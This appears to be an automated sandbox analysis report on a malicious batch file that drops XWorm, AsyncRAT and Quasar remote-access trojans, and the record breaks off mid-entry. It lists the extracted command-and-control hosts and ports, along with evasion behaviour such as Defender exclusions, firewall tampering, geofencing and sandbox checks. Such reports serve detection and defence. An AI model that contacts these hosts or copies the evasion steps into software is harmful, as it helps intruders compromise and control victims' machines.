Analysis
-
max time kernel
1049s -
max time network
1048s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29-06-2024 20:11
Static task
static1
General
-
Target
Output.bat
-
Size
1.1MB
-
MD5
1897b3980473ad054ab05b0f2ced4de7
-
SHA1
a694b444dc8dd30e07f69671c3905ffb6fe13532
-
SHA256
3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
-
SHA512
6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1
-
SSDEEP
24576:H9/ZDtETtFPa65VkOdET4sDgnVI4jGzwMVACzrDc:HqRcRBkwAGM
Malware Config
Extracted
xworm
best-bird.gl.at.ply.gg:27196
super-nearest.gl.at.ply.gg:17835
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe family_xworm behavioral1/memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp family_xworm C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe family_xworm behavioral1/memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp family_xworm -
Modifies firewall policy service 3 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{1A280F62-479D-4C75-BCF5-F49586D9CB43} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{46180BB6-C69C-4461-B788-35D602E3D2C8} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" svchost.exe -
Modifies security service 2 TTPs 4 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" svchost.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" svchost.exe -
Quasar payload 1 IoCs
Processes:
resource yara_rule C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe family_quasar -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 856 powershell.exe 3740 powershell.exe 2688 powershell.exe 4664 powershell.exe 620 powershell.exe 2652 powershell.exe 2736 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exemshta.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 4 IoCs
Processes:
hat.exemshta.exeONPE.exesvchost.exepid process 744 hat.exe 4996 mshta.exe 4332 ONPE.exe 2360 svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\G: svchost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com -
Drops file in System32 directory 43 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exepowershell.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx svchost.exe File created C:\Windows\system32\wdi\LogFiles\StartupInfo\S-1-5-21-1337824034-2731376981-3755436523-1000_StartupInfo3.xml svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\SRU\SRU.log svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\SRU\SRUDB.jfm svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File created C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl svchost.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\system32\SRU\SRUDB.dat svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx svchost.exe File opened for modification C:\Windows\system32\WDI\BootPerformanceDiagnostics_SystemData.bin svchost.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe powershell.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF svchost.exe File opened for modification C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\SRU\SRU.chk svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx svchost.exe File opened for modification C:\Windows\system32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-1337824034-2731376981-3755436523-1000_UserData.bin svchost.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File created C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl svchost.exe File opened for modification C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Networking%4Operational.evtx svchost.exe -
Drops file in Windows directory 3 IoCs
Processes:
Explorer.EXEsvchost.exedescription ioc process File created C:\Windows\INF\netsstpa.PNF Explorer.EXE File created C:\Windows\INF\netrasa.PNF Explorer.EXE File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\IESettingSync Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE -
Modifies data under HKEY_USERS 14 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = 82079ef260cada01 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\RAS AutoDial svchost.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\RAS AutoDial\Default svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = cc2ee48762cada01 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecision = "0" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = caabb54d61cada01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionReason = "1" svchost.exe -
Modifies registry class 53 IoCs
Processes:
svchost.exeExplorer.EXEpowershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133641655111398851" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655992145014" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655787268193" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133641655754612850" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655800705768" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655955094805" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655285734553" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655790549625" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655800862074" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655989134936" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655957085279" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655992024854" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133641655965644999" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655283604926" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655960914783" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133641655790862123" svchost.exe Key created 